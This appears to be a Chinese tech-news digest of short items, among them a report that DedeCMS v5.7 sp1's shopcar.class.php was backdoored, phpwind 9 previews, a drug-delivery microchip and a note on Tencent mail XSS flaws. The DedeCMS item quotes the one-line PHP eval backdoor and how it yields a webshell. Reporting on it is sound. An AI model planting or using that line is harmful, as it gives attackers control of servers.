分类: 智者江湖

传织梦CMS系统被植入后门 网站控制权恐遭窃取 

  据悉,织梦CMS(Dedecms)v5.7 sp1版本的中的shopcar。class。php文件被植入一句后门代码 “@eval(file_get_contents(‘php://input’));”。通过利用该后门,黑客只需构造简单的数据包提交到服务器,就能 获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限。

phpwind next小范围测试 “通知中心”功能曝光

  从新版本的通知中心,不难看出phpwind新版本仍然是以提升社区论坛的内容互动和用户黏性为主,特别是新版本UI、架构上的轻设计,将内容和用户两 者都以“主体”身份出现,以一种“去中心化”的姿态呈现在大家眼前,创新和改变的决心非常大。 目前phpwind 9还有不少的功能还未完善,小编也将持续的探索phpwind 9最新功能,力争为大家带来最新的独家报道。

MIT和业界合作 无线给药微芯片成功在人体测试

每天都要打针让你觉得痛苦吗?这个新的给药方式也许能让你少受一些皮肉之苦。约十年前,MIT 的教授 Robert Langer 和 Michael Cima 开始发展无线控制给药的微芯片,上周剑桥的研究员和 MicroCHIPS 的科学家宣称他们已经成功将这样的微芯片用在骨质疏松症患者的身上(患者必须每天注射 teriparatide,一种促进骨质生成的药物)。

Drupal 创始人透露 Drupal 8 Web 服务的初期想法

HTML 5 显然是未来很重要的部分之一,因此,为了现实这些想法,我得有一个专门的计划。我相信我们可以有不同的人来一起完成这些工作,我也继续在与一些人讨论关于 HTML 5 的这些初步想法。当我们把这些想法都通过 Drupal 8 实现的时候,那会一个不错的局面。

转-腾讯多个unfixed bugs

一、邪恶的filterflag 默认直接引入filterflag=true,当被攻击者使用此功能时,就可能直接被xss攻击。我们在看看“读邮件”功能,通过上次报告的腾讯“修补”的方式其实只是同过引入一个iframe打开,通过分析访问的url可以得到真正的读邮件功能的url:

phpwind9.0艳照曝光,创新多多

从研发人员那里拿到了第一手phpwind9.0产品效果图,微博首发,总结了几个特点: 1 、更轻 和 以往产品思路截然相反 重视核心功能的极致优化 2 、更互动 发挥了社区最核心的互动特征 类微博特性 3、 表现形式更多样 结合了cms 图墙等多种新元素 4 更开放,社区开放化标准,据说类似新浪app接入,对接各类应用。

《愤怒的小鸟》获得成功的8大关键因素

Rovio的成功绝非偶然,《愤怒的小鸟》是他们开发的第52款游戏,这家公司也曾经濒临破产边缘,公司员工的数量也曾经从最多时的50名缩减到12名。为了获得生存,他们必须想办法成为赢家,而最终他们也做到了这一点。不可否认,《愤怒的小鸟》的成功带有稍许的运气因子,但是主要还是取决于Rovio采取的正确方法。